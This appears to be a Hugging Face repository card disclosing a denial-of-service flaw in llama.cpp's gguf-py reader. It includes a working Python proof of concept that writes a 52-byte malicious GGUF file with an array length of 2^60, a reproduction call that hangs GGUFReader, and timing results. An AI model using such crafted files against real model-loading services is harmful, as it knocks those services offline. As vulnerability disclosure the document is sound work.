YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
GGUF DoS PoC β CWE-400
Proof of Concept for Denial of Service vulnerability in gguf-py (llama.cpp).
Vulnerability
A 52-byte malicious GGUF file causes GGUFReader to enter an infinite loop
(100% CPU, never returns) by setting metadata array length to 2^60.
Root cause: gguf_reader.py:247 β for idx in range(alen[0]) with no bounds check.
PoC
import struct
with open('dos.gguf', 'wb') as f:
f.write(b'GGUF')
f.write(struct.pack('<I', 3)) # Version
f.write(struct.pack('<Q', 0)) # 0 tensors
f.write(struct.pack('<Q', 1)) # 1 metadata KV
f.write(struct.pack('<Q', 4)) # Key length
f.write(b'evil')
f.write(struct.pack('<I', 9)) # Type = ARRAY
f.write(struct.pack('<I', 4)) # Array type = UINT32
f.write(struct.pack('<Q', 2**60)) # Length = 2^60 β HANG
Reproduction
from gguf import GGUFReader
r = GGUFReader('dos.gguf') # hangs indefinitely
Impact
| Array Length | Time |
|---|---|
| 2^16 | 0.125s |
| 2^20 | 2.5s |
| 2^60 | β |
- Downloads last month
- 8
Hardware compatibility
Log In to add your hardware
We're not able to determine the quantization variants.
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support